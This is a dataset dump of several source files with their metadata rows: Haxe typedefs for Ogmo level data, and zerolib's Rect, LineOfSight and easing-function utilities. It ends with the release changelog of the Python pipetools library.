name:String,
limit:Int,
size:{ x:Int, y:Int },
origin:{ x:Int, y:Int },
originAnchored:Bool,
shape:{ label:String, points:Array<{ x:Int, y:Int }> },
color:String,
tileX:Bool,
tileY:Bool,
tileSize:{ x:Int, y:Int },
resizeableX:Bool,
resizeableY:Bool,
rotatable:Bool,
rotationDegrees:Int,
canFlipX:Bool,
canFlipY:Bool,
canSetColor:Bool,
hasNodes:Bool,
nodeLimit:Int,
nodeDisplay:Int,
nodeGhost:Bool,
tags:Array<String>,
values:Array<Dynamic>,
}
// Project Tileset
@:dox(hide)
typedef ProjectTilesetData = {
label:String,
path:String,
image:String,
tileWidth:Int,
tileHeight:Int,
tileSeparationX:Int,
tileSeparationY:Int,
}
// Parsed .JSON Level data
@:dox(hide)
typedef LevelData = {
width:Int,
height:Int,
offsetX:Int,
offsetY:Int,
layers:Array<LayerData>,
?values:Dynamic,
}
// Level Layer data
@:dox(hide)
typedef LayerData = {
name:String,
_eid:String,
offsetX:Int,
offsetY:Int,
gridCellWidth:Int,
gridCellHeight:Int,
gridCellsX:Int,
gridCellsY:Int,
?entities:Array<EntityData>,
?decals:Array<DecalData>,
?tileset:String,
?data:Array<Int>,
?tileFlags:Array<Int>,
?data2D:Array<Array<Int>>,
?tileFlags2D:Array<Array<Int>>,
?dataCSV:String,
?exportMode:Int,
?arrayMode:Int,
}
// Tile subset of LayerData
@:dox(hide)
typedef TileLayer = {
name:String,
_eid:String,
offsetX:Int,
offsetY:Int,
gridCellWidth:Int,
gridCellHeight:Int,
gridCellsX:Int,
gridCellsY:Int,
tileset:String,
exportMode:Int,
arrayMode:Int,
?data:Array<Int>,
?tileFlags:Array<Int>,
?data2D:Array<Array<Int>>,
?tileFlags2D:Array<Array<Int>>,
?dataCSV:String,
}
// Grid subset of LayerData
@:dox(hide)
typedef GridLayer = {
name:String,
_eid:String,
offsetX:Int,
offsetY:Int,
gridCellWidth:Int,
gridCellHeight:Int,
gridCellsX:Int,
gridCellsY:Int,
arrayMode:Int,
?grid:Array<String>,
?grid2D:Array<Array<String>>,
}
// Entity subset of LayerData
@:dox(hide)
typedef EntityLayer = {
name:String,
_eid:String,
offsetX:Int,
offsetY:Int,
gridCellWidth:Int,
gridCellHeight:Int,
gridCellsX:Int,
gridCellsY:Int,
entities:Array<EntityData>,
}
// Individual Entity data
@:dox(hide)
typedef EntityData = {
name:String,
id:Int,
_eid:String,
x:Int,
y:Int,
?width:Int,
?height:Int,
?originX:Int,
?originY:Int,
?rotation:Float,
?flippedX:Bool,
?flippedY:Bool,
?nodes:Array<{x:Float, y:Float}>,
?values:Dynamic,
}
// Decal subset of LayerData
@:dox(hide)
typedef DecalLayer = {
name:String,
_eid:String,
offsetX:Int,
offsetY:Int,
gridCellWidth:Int,
gridCellHeight:Int,
gridCellsX:Int,
gridCellsY:Int,
decals:Array<DecalData>,
}
// Individual Decal data
@:dox(hide)
typedef DecalData = {
x:Int,
y:Int,
texture:String,
?scaleX:Float,
?scaleY:Float,
?rotation:Float,
?values:Dynamic,
}
// endregion
| 7,286 | OgmoUtils | hx | en | haxe | code | {"qsc_code_num_words": 919, "qsc_code_num_chars": 7286.0, "qsc_code_mean_word_length": 5.54733406, "qsc_code_frac_words_unique": 0.19368879, "qsc_code_frac_chars_top_2grams": 0.03138486, "qsc_code_frac_chars_top_3grams": 0.04707729, "qsc_code_frac_chars_top_4grams": 0.01569243, "qsc_code_frac_chars_dupe_5grams": 0.39505689, "qsc_code_frac_chars_dupe_6grams": 0.31816399, "qsc_code_frac_chars_dupe_7grams": 0.29384072, "qsc_code_frac_chars_dupe_8grams": 0.29384072, "qsc_code_frac_chars_dupe_9grams": 0.29384072, "qsc_code_frac_chars_dupe_10grams": 0.29384072, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00312243, "qsc_code_frac_chars_whitespace": 0.16483667, "qsc_code_size_file_byte": 7286.0, "qsc_code_num_lines": 367.0, "qsc_code_num_chars_line_max": 106.0, "qsc_code_num_chars_line_mean": 19.85286104, "qsc_code_frac_chars_alphabet": 0.83467543, "qsc_code_frac_chars_comments": 0.24595114, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.39442231, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00054605, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00182017, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
01010111/zerolib | zero/utilities/Rect.hx | package zero.utilities;
using Math;
/**
* A simple Rectangle class
*
* **Usage:**
*
* - Initialize using Rect.get() `var rect = Rect.get(0, 0, 100, 100);`
* - Or with an array `var rect:Rect = [0, 0, 100, 100];`
* - Recycle rectangles when you're done with them: `my_rect.put()`
*/
@:forward
abstract Rect(Vec4)
{
static var epsilon:Float = 1e-8;
static function zero(n:Float):Float return n.abs() <= epsilon ? 0 : n;
static var pool:Array<Rect> = [];
public static function get(x:Float = 0, y:Float = 0, width:Float = 0, height:Float = 0):Rect return pool != null && pool.length > 0 ? pool.shift().set(x, y, width, height) : new Rect(x, y, width, height);
public inline function put()
{
pool.push(cast this);
this = null;
}
@:from static function from_array_float(input:Array<Float>) return Rect.get(input[0], input[1], input[2], input[3]);
@:from static function from_array_int(input:Array<Int>) return Rect.get(input[0], input[1], input[2], input[3]);
@:arrayAccess function arr_set(n:Int, v:Float) n < 0 || n > 3 ? return : this[n] = v;
@:arrayAccess function arr_get(n:Int):Float return this[n.min(3).max(0).floor()];
public var width (get, set):Float;
inline function get_width() return this.z;
inline function set_width(v) return this.z = v;
public var height (get, set):Float;
inline function get_height() return this.w;
inline function set_height(v) return this.w = v;
public var top (get, set):Float;
inline function get_top() return this.y;
inline function set_top(v) return this.y = v;
public var left (get, set):Float;
inline function get_left() return this.x;
inline function set_left(v) return this.x = v;
public var bottom (get, set):Float;
inline function get_bottom() return this.y + height;
inline function set_bottom(v:Float)
{
height = v - this.y;
return v;
}
public var right (get, set):Float;
inline function get_right() return this.x + width;
inline function set_right(v:Float)
{
width = v - this.x;
return v;
}
public var midpoint (get, never):Vec2;
inline function get_midpoint() return Vec2.get(this.x + width/2, this.y + height/2);
inline function new(x:Float = 0, y:Float = 0, z:Float = 0, w:Float = 0) this = [x, y, z, w];
public inline function set(x:Float = 0, y:Float = 0, z:Float = 0, w:Float = 0):Rect
{
this[0] = zero(x);
this[1] = zero(y);
this[2] = zero(z);
this[3] = zero(w);
return cast this;
}
public inline function toString():String return 'x: ${this.x} | y: ${this.y} | width: $width | height: $height';
public inline function area():Float return width * height;
public inline function contains_point(vec2:Vec2) return top <= vec2.y && bottom >= vec2.y && left <= vec2.x && right >= vec2.x;
public inline function is_empty():Bool return width == 0 || height == 0;
public inline function set_position(v:Vec2):Rect return set(v.x, v.y, width, height);
public inline function equals(v:Rect):Bool return this.x == v.x && this.y == v.y && width == v.width && height == v.height;
public inline function intersection(v:Rect):Rect
{
var x0 = left.max(v.left);
var x1 = right.min(v.right);
if (x1 < x0) return get();
var y0 = top.max(v.top);
var y1 = bottom.min(v.bottom);
if (y1 < y0) return get();
return get(x0, y0, x1 - x0, y1 - y0);
}
@:op(A + B) static function add(v1:Rect, v2:Rect):Rect return Rect.get(v1.x + v2.x, v1.y + v2.y, v1.z + v2.z, v1.w + v2.w);
@:op(A + B) static function add_f(v:Rect, n:Float):Rect return Rect.get(v.x + n, v.y + n, v.z + n, v.w + n);
@:op(A + B) static function add_p(v:Rect, v2:Vec2):Rect return Rect.get(v.x + v2.x, v.y + v2.y, v.z, v.w);
@:op(A - B) static function subtract(v1:Rect, v2:Rect):Rect return Rect.get(v1.x - v2.x, v1.y - v2.y, v1.z - v2.z, v1.w - v2.w);
@:op(A - B) static function subtract_f(v:Rect, n:Float):Rect return Rect.get(v.x - n, v.y - n, v.z - n, v.w - n);
@:op(A + B) static function subtract_p(v:Rect, v2:Vec2):Rect return Rect.get(v.x - v2.x, v.y - v2.y, v.z, v.w);
@:op(A * B) static function multiply(v1:Rect, v2:Rect):Rect return Rect.get(v1.x * v2.x, v1.y * v2.y, v1.z * v2.z, v1.w * v2.w);
@:op(A * B) static function multiply_f(v:Rect, n:Float):Rect return Rect.get(v.x * n, v.y * n, v.z * n, v.w * n);
@:op(A + B) static function multiply_p(v:Rect, v2:Vec2):Rect return Rect.get(v.x * v2.x, v.y * v2.y, v.z, v.w);
@:op(A / B) static function divide(v1:Rect, v2:Rect):Rect return Rect.get(v1.x / v2.x, v1.y / v2.y, v1.z / v2.z, v1.w / v2.w);
@:op(A / B) static function divide_f(v:Rect, n:Float):Rect return Rect.get(v.x / n, v.y / n, v.z / n, v.w / n);
@:op(A + B) static function divide_p(v:Rect, v2:Vec2):Rect return Rect.get(v.x / v2.x, v.y / v2.y, v.z, v.w);
@:op(A % B) static function mod(v1:Rect, v2:Rect):Rect return Rect.get(v1.x % v2.x, v1.y % v2.y, v1.z % v2.z, v1.w % v2.w);
@:op(A % B) static function mod_f(v:Rect, n:Float):Rect return Rect.get(v.x % n, v.y % n, v.z % n, v.w % n);
@:op(A + B) static function mod_p(v:Rect, v2:Vec2):Rect return Rect.get(v.x % v2.x, v.y % v2.y, v.z, v.w);
} | 5,041 | Rect | hx | en | haxe | code | {"qsc_code_num_words": 967, "qsc_code_num_chars": 5041.0, "qsc_code_mean_word_length": 3.29989659, "qsc_code_frac_words_unique": 0.10754912, "qsc_code_frac_chars_top_2grams": 0.10090881, "qsc_code_frac_chars_top_3grams": 0.06925729, "qsc_code_frac_chars_top_4grams": 0.04700721, "qsc_code_frac_chars_dupe_5grams": 0.47007208, "qsc_code_frac_chars_dupe_6grams": 0.44343466, "qsc_code_frac_chars_dupe_7grams": 0.35004701, "qsc_code_frac_chars_dupe_8grams": 0.33437794, "qsc_code_frac_chars_dupe_9grams": 0.33437794, "qsc_code_frac_chars_dupe_10grams": 0.33437794, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.03506244, "qsc_code_frac_chars_whitespace": 0.17397342, "qsc_code_size_file_byte": 5041.0, "qsc_code_num_lines": 113.0, "qsc_code_num_chars_line_max": 206.0, "qsc_code_num_chars_line_mean": 44.61061947, "qsc_code_frac_chars_alphabet": 0.73126801, "qsc_code_frac_chars_comments": 0.0505852, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.02298851, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.01149425, "qsc_code_frac_chars_string_length": 0.01274285, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
01010111/zerolib | zero/utilities/LineOfSight.hx | package zero.utilities;
using Math;
/**
* A Haxe implementation of the line of sight algorithm on [roguebasin](https://github.com/01010111/zerolib/wiki/LineOfSight)
* _Deprecated in favor of `AStar.los()`_
* **Usage:**
* ```
* var map_data = [
* ' ######## '.split(''),
* ' #......# '.split(''),
* ' #......# '.split(''),
* ' #......####### '.split(''),
* ' ####.####....# '.split(''),
* ' #..........# '.split(''),
* ' #...###....# '.split(''),
* ' ##### ###### '.split(''),
* ];
* var los = new LineOfSight({ map: map_data, walls: ['#'] });
* var p = { x: 5, y: 5 };
*
* los.fov(p.x, p.y, 6);
* for (row in los.place_char(los.get_lit_map('?'), '@', p)) trace(row.join(''));
* ```
* Output:
* ```
* ???#####????????
* ????...?????????
* ????...?????????
* ????...?????????
* ??###.####.?????
* #.@.....?????
* ?? #...###.?????
* ???#####????????
* ```
*/
class LineOfSight<T>
{
var map:Array<Array<T>>;
var walls:Array<T>;
var lit_map:Array<Array<Int>>;
var memorized:Array<Array<Int>>;
public function new(options:{ map:Array<Array<T>>, walls:Array<T> })
{
map = options.map;
walls = options.walls;
lit_map = [ for (j in 0...map.length) [ for (i in 0...map[j].length) 0 ] ];
memorized = [ for (j in 0...map.length) [ for (i in 0...map[j].length) 0 ] ];
}
public function fov(x:Int, y:Int, radius:Int)
{
clear_lit_map();
for (j in -radius...radius + 1) for (i in -radius...radius + 1)
if (i * i + j * j < radius * radius)
los({ x: x, y: y }, { x: x + i, y: y + j });
}
public function get_lit_map(unseen:T):Array<Array<T>>
{
return [
for (j in 0...map.length) [
for (i in 0...map[j].length)
lit_map[j][i] == 1 ? map[j][i] : unseen
]
];
}
public function place_char(map:Array<Array<T>>, char:T, p:{ x:Int, y:Int }):Array<Array<T>>
{
map[p.y][p.x] = char;
return map;
}
function los(p1:{ x:Int, y:Int }, p2:{ x:Int, y:Int })
{
var d = { x: p2.x - p1.x, y: p2.y - p1.y };
var s = { x: (p1.x < p2.x) ? 1 : -1, y: (p1.y < p2.y) ? 1 : -1 };
var next = { x: p1.x, y: p1.y };
var dist:Float = (d.x * d.x + d.y * d.y).sqrt();
while (next.x != p2.x && next.y != p2.y)
{
if (walls.indexOf(map[next.y][next.x]) >= 0) return tag_memorised(next);
if ((d.y * (next.x - p1.x + s.x) - d.x * (next.y - p1.y)).abs() / dist < 0.5) next.x += s.x;
else if((d.y * (next.x - p1.x) - d.x * (next.y - p1.y + s.y)).abs() / dist < 0.5) next.y += s.y;
else next = { x: next.x + s.x, y: next.y + s.y }
}
return lit(p2);
}
function in_bounds(p:{ x:Int, y:Int }):Bool return p.y >= 0 && p.y < map.length && p.x >= 0 && p.x < map[p.y].length;
function clear_lit_map() for (row in lit_map) for (i in row) i = 0;
function tag_memorised(p:{ x:Int, y:Int }) memorized[p.y][p.x] = 1;
function lit(p:{ x:Int, y:Int }) if (in_bounds(p)) lit_map[p.y][p.x] = 1;
} | 2,896 | LineOfSight | hx | en | haxe | code | {"qsc_code_num_words": 466, "qsc_code_num_chars": 2896.0, "qsc_code_mean_word_length": 2.9248927, "qsc_code_frac_words_unique": 0.17811159, "qsc_code_frac_chars_top_2grams": 0.01614087, "qsc_code_frac_chars_top_3grams": 0.02567865, "qsc_code_frac_chars_top_4grams": 0.04108584, "qsc_code_frac_chars_dupe_5grams": 0.21056493, "qsc_code_frac_chars_dupe_6grams": 0.15627293, "qsc_code_frac_chars_dupe_7grams": 0.13646368, "qsc_code_frac_chars_dupe_8grams": 0.07410125, "qsc_code_frac_chars_dupe_9grams": 0.07410125, "qsc_code_frac_chars_dupe_10grams": 0.07410125, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02430402, "qsc_code_frac_chars_whitespace": 0.21857735, "qsc_code_size_file_byte": 2896.0, "qsc_code_num_lines": 99.0, "qsc_code_num_chars_line_max": 126.0, "qsc_code_num_chars_line_mean": 29.25252525, "qsc_code_frac_chars_alphabet": 0.57799381, "qsc_code_frac_chars_comments": 0.30628453, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
01010111/zerolib | zero/utilities/Ease.hx | package zero.utilities;
/**
A collection of easing functions, taken from HaxeFlixel's `FlxEase`
**/
class Ease {
static var PI2:Float = Math.PI / 2;
static var EL:Float = 2 * Math.PI / .45;
static var B1:Float = 1 / 2.75;
static var B2:Float = 2 / 2.75;
static var B3:Float = 1.5 / 2.75;
static var B4:Float = 2.5 / 2.75;
static var B5:Float = 2.25 / 2.75;
static var B6:Float = 2.625 / 2.75;
static var ELASTIC_AMPLITUDE:Float = 1;
static var ELASTIC_PERIOD:Float = 0.4;
public static inline function linear(t:Float):Float {
return t;
}
public static inline function quadIn(t:Float):Float {
return t * t;
}
public static inline function quadOut(t:Float):Float {
return -t * (t - 2);
}
public static inline function quadInOut(t:Float):Float {
return t <= .5 ? t * t * 2 : 1 - (--t) * t * 2;
}
public static inline function cubeIn(t:Float):Float {
return t * t * t;
}
public static inline function cubeOut(t:Float):Float {
return 1 + (--t) * t * t;
}
public static inline function cubeInOut(t:Float):Float {
return t <= .5 ? t * t * t * 4 : 1 + (--t) * t * t * 4;
}
public static inline function quartIn(t:Float):Float {
return t * t * t * t;
}
public static inline function quartOut(t:Float):Float {
return 1 - (t -= 1) * t * t * t;
}
public static inline function quartInOut(t:Float):Float {
return t <= .5 ? t * t * t * t * 8 : (1 - (t = t * 2 - 2) * t * t * t) / 2 + .5;
}
public static inline function quintIn(t:Float):Float {
return t * t * t * t * t;
}
public static inline function quintOut(t:Float):Float {
return (t = t - 1) * t * t * t * t + 1;
}
public static inline function quintInOut(t:Float):Float {
return ((t *= 2) < 1) ? (t * t * t * t * t) / 2 : ((t -= 2) * t * t * t * t + 2) / 2;
}
public static inline function smoothStepIn(t:Float):Float {
return 2 * smoothStepInOut(t / 2);
}
public static inline function smoothStepOut(t:Float):Float {
return 2 * smoothStepInOut(t / 2 + 0.5) - 1;
}
public static inline function smoothStepInOut(t:Float):Float {
return t * t * (t * -2 + 3);
}
public static inline function smootherStepIn(t:Float):Float {
return 2 * smootherStepInOut(t / 2);
}
public static inline function smootherStepOut(t:Float):Float {
return 2 * smootherStepInOut(t / 2 + 0.5) - 1;
}
public static inline function smootherStepInOut(t:Float):Float {
return t * t * t * (t * (t * 6 - 15) + 10);
}
public static inline function sineIn(t:Float):Float {
return -Math.cos(PI2 * t) + 1;
}
public static inline function sineOut(t:Float):Float {
return Math.sin(PI2 * t);
}
public static inline function sineInOut(t:Float):Float {
return -Math.cos(Math.PI * t) / 2 + .5;
}
public static function bounceIn(t:Float):Float {
t = 1 - t;
if (t < B1)
return 1 - 7.5625 * t * t;
if (t < B2)
return 1 - (7.5625 * (t - B3) * (t - B3) + .75);
if (t < B4)
return 1 - (7.5625 * (t - B5) * (t - B5) + .9375);
return 1 - (7.5625 * (t - B6) * (t - B6) + .984375);
}
public static function bounceOut(t:Float):Float {
if (t < B1)
return 7.5625 * t * t;
if (t < B2)
return 7.5625 * (t - B3) * (t - B3) + .75;
if (t < B4)
return 7.5625 * (t - B5) * (t - B5) + .9375;
return 7.5625 * (t - B6) * (t - B6) + .984375;
}
public static function bounceInOut(t:Float):Float {
if (t < .5) {
t = 1 - t * 2;
if (t < B1)
return (1 - 7.5625 * t * t) / 2;
if (t < B2)
return (1 - (7.5625 * (t - B3) * (t - B3) + .75)) / 2;
if (t < B4)
return (1 - (7.5625 * (t - B5) * (t - B5) + .9375)) / 2;
return (1 - (7.5625 * (t - B6) * (t - B6) + .984375)) / 2;
}
t = t * 2 - 1;
if (t < B1)
return (7.5625 * t * t) / 2 + .5;
if (t < B2)
return (7.5625 * (t - B3) * (t - B3) + .75) / 2 + .5;
if (t < B4)
return (7.5625 * (t - B5) * (t - B5) + .9375) / 2 + .5;
return (7.5625 * (t - B6) * (t - B6) + .984375) / 2 + .5;
}
public static inline function circIn(t:Float):Float {
return -(Math.sqrt(1 - t * t) - 1);
}
public static inline function circOut(t:Float):Float {
return Math.sqrt(1 - (t - 1) * (t - 1));
}
public static function circInOut(t:Float):Float {
return t <= .5 ? (Math.sqrt(1 - t * t * 4) - 1) / -2 : (Math.sqrt(1 - (t * 2 - 2) * (t * 2 - 2)) + 1) / 2;
}
public static inline function expoIn(t:Float):Float {
return Math.pow(2, 10 * (t - 1));
}
public static inline function expoOut(t:Float):Float {
return -Math.pow(2, -10 * t) + 1;
}
public static function expoInOut(t:Float):Float {
return t < .5 ? Math.pow(2, 10 * (t * 2 - 1)) / 2 : (-Math.pow(2, -10 * (t * 2 - 1)) + 2) / 2;
}
public static inline function backIn(t:Float):Float {
return t * t * (2.70158 * t - 1.70158);
}
public static inline function backOut(t:Float):Float {
return 1 - (--t) * (t) * (-2.70158 * t - 1.70158);
}
public static function backInOut(t:Float):Float {
t *= 2;
if (t < 1)
return t * t * (2.70158 * t - 1.70158) / 2;
t--;
return (1 - (--t) * (t) * (-2.70158 * t - 1.70158)) / 2 + .5;
}
public static inline function elasticIn(t:Float):Float {
return -(ELASTIC_AMPLITUDE * Math.pow(2,
10 * (t -= 1)) * Math.sin((t - (ELASTIC_PERIOD / (2 * Math.PI) * Math.asin(1 / ELASTIC_AMPLITUDE))) * (2 * Math.PI) / ELASTIC_PERIOD));
}
public static inline function elasticOut(t:Float):Float {
return (ELASTIC_AMPLITUDE * Math.pow(2,
-10 * t) * Math.sin((t - (ELASTIC_PERIOD / (2 * Math.PI) * Math.asin(1 / ELASTIC_AMPLITUDE))) * (2 * Math.PI) / ELASTIC_PERIOD)
+ 1);
}
public static function elasticInOut(t:Float):Float {
if (t < 0.5) {
return -0.5 * (Math.pow(2, 10 * (t -= 0.5)) * Math.sin((t - (ELASTIC_PERIOD / 4)) * (2 * Math.PI) / ELASTIC_PERIOD));
}
return Math.pow(2, -10 * (t -= 0.5)) * Math.sin((t - (ELASTIC_PERIOD / 4)) * (2 * Math.PI) / ELASTIC_PERIOD) * 0.5 + 1;
}
} | 5,843 | Ease | hx | en | haxe | code | {"qsc_code_num_words": 942, "qsc_code_num_chars": 5843.0, "qsc_code_mean_word_length": 3.5329087, "qsc_code_frac_words_unique": 0.10403397, "qsc_code_frac_chars_top_2grams": 0.03305288, "qsc_code_frac_chars_top_3grams": 0.12229567, "qsc_code_frac_chars_top_4grams": 0.16346154, "qsc_code_frac_chars_dupe_5grams": 0.73888221, "qsc_code_frac_chars_dupe_6grams": 0.64032452, "qsc_code_frac_chars_dupe_7grams": 0.52914663, "qsc_code_frac_chars_dupe_8grams": 0.4453125, "qsc_code_frac_chars_dupe_9grams": 0.30228365, "qsc_code_frac_chars_dupe_10grams": 0.21153846, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.09451496, "qsc_code_frac_chars_whitespace": 0.24490844, "qsc_code_size_file_byte": 5843.0, "qsc_code_num_lines": 205.0, "qsc_code_num_chars_line_max": 139.0, "qsc_code_num_chars_line_mean": 28.50243902, "qsc_code_frac_chars_alphabet": 0.65979148, "qsc_code_frac_chars_comments": 0.01300702, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.07317073, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
0101/pipetools | changelog.rst |
1.1.0
----------
2021-11-26
* Added implementation for most of the magic methods on X object
1.0.1
----------
2021-06-29
* Fixed coverage badge in PyPI description
1.0.0
----------
2021-06-29
* Package classified as stable
0.3.6
----------
2020-10-21
* Fix import for Python >= 3.9 (#16)
0.3.5
----------
2019-12-01
* Fixed X object division in Python 3
0.3.4
----------
2018-06-13
* Fixed UnicodeDecodeError during installation
0.3.3
----------
2018-05-30
* Added take_until.including
0.3.2
----------
2018-05-26
* No crash in Python 2 when partially applying a non-standard callable
* Regex conditions ignore None instead of throwing an exception
* maybe can be inserted in the middle of a pipe without parentheses
0.3.1
----------
2018-03-23
* Added tee util
* flatten will leave dictionaries (Mappings) alone
0.3.0
----------
2016-08-03
* added Python 3 support
0.2.7
----------
2014-03-19
* fixed checking if objects are iterable
0.2.6
----------
2013-09-02
* removed pipe_exception_handler (did more harm than good most of the time)
0.2.5
----------
2013-08-13
* Maybe returns None when called with None
* not calling repr() on stuff if we don't need to
0.2.4
----------
2013-07-13
* added drop_first
* fixed unicode formatting problem
0.2.3
----------
2013-04-24
* added sort_by.descending
* group_by returns item iterator instead of a dictionary
0.2.2
----------
2013-04-16
* X objects create bound methods on classes
* added support for X division
0.2.1
----------
2013-02-10
* added automatic regex conditions
* renamed xcurry to xpartial (turns out currying is something else)
0.2.0
----------
2012-11-14
* added support for X >=, <=, - and ** operations
* fixed static item handling in ds_builder
0.1.9
----------
2012-11-05
* added xcurry
* improved XObject naming
0.1.8
----------
2012-10-31
* added as_kwargs
* added take_until
* X object implicit piping (without ~)
* fixed naming X-objects so it doesn't fail with tuples
0.1.7
----------
2012-10-25
* friendlier debugging
* added changelog
